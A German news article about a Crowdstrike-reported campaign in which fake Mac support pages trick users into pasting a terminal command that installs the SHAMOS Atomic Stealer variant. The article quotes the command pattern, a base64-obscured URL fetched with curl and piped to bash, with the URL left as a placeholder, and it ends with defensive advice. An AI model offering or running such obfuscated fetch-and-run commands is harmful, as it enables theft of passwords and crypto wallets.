Mac-Support gesucht, Malware gefunden: Trickbetrüger verbreiten Trojaner per Kommandozeilenbefehl
Auch Macs sind nicht perfekt. Insbesondere wenn es an die Verbindung mit dem Internet oder einem Drucker geht, stößt selbst ein erfahrener Mac-Nutzer gelegentlich auf Probleme, welche er nicht auf Anhieb lösen kann. Eine Internet-Suche hilft in diesem Fall oft weiter. Das wissen auch Malware-Entwickler, die Daten und Kryptowährungen stehlen wollen. In den Sommermonaten beobachtete die Sicherheitsfirma Crowdstrike
gezielte Angriffe auf Mac-Nutzer. Die Masche: Eine Website bietet Antworten auf häufig im Netz gestellte Fragen – und webt darin einen Terminalbefehl ein, welcher eine neue Version der Atomic-Stealer-Malware installiert. Crowdstrike nennt die Variante SHAMOS – eine Kombination aus "Shell" (Kommandozeile) und Atomic macOS Stealer ("AMOS").
Die Erklärungen fanden sich auf Websites mit authentisch erscheinenden URLs wie mac-safer.com oder rescue-mac.com. Mittels bezahlter Werbung sorgten die Betrüger dafür, dass sie über legitimen Suchresultaten eingeblendet wurden. Die Anleitungen begannen stets mit tatsächlich hilfreichen Empfehlungen, etwa zum Hinzufügen eines Druckers in den Systemeinstellungen. Allerdings waren sie stets mit einem Ausflug in das Dienstprogramm verbunden. Anwender sollten einen Befehl kopieren, in die Kommandozeile einfügen und mit der Eingabetaste bestätigen. Dieser Befehl war so gestaltet, dass er für Uneingeweihte maximal kryptisch aussah:
/bin/bash -c "$(curl -fsSL $(echo [lange_Zeichenkette] | base64 -d))"
Die lange Zeichenkette war eine über den Base64-Algorithmus unkenntlich gemachte URL, von der mittels des curl-Befehls ein Skript heruntergeladen wurde. Dieses wird sogleich ausgeführt – der Anwender wird in der Kommandozeile nach dem Administratorkennwort gefragt. Mit dessen Hilfe installiert es daraufhin die eigentliche Malware. Diese nimmt im Anschluss im Hintergrund ihre Arbeit auf, sammelt gezielt Informationen aus Cryptowährungs-Wallets, der macOS-Passwortverwaltung sowie der Notizen-App, um sie in einer ZIP-Datei an einen Server zu verschicken.
Vorsicht bei Terminal-BefehlenZusätzlich zu fingierten Mac-Support-Tipps kursierten auch Anleitungen zur Installation des alternativen Kommandozeilenprogramms
iTerm2 im Netz, welche denselben Befehl nutzten. Mac-Nutzer sollten stets auf der Hut sein, wenn ein Terminal-Befehl empfohlen wird – insbesondere, wenn eine klare und nachvollziehbare Erläuterung fehlt. Die Faustregel lautet: Gebe nur etwas in die Kommandozeile ein, was Du selbst verstehst. Wenn das Verständnis nicht ausreicht, sollte man zunächst jemanden fragen, der sich mit dem Terminal auskennt, und sich die Funktion erläutern lassen.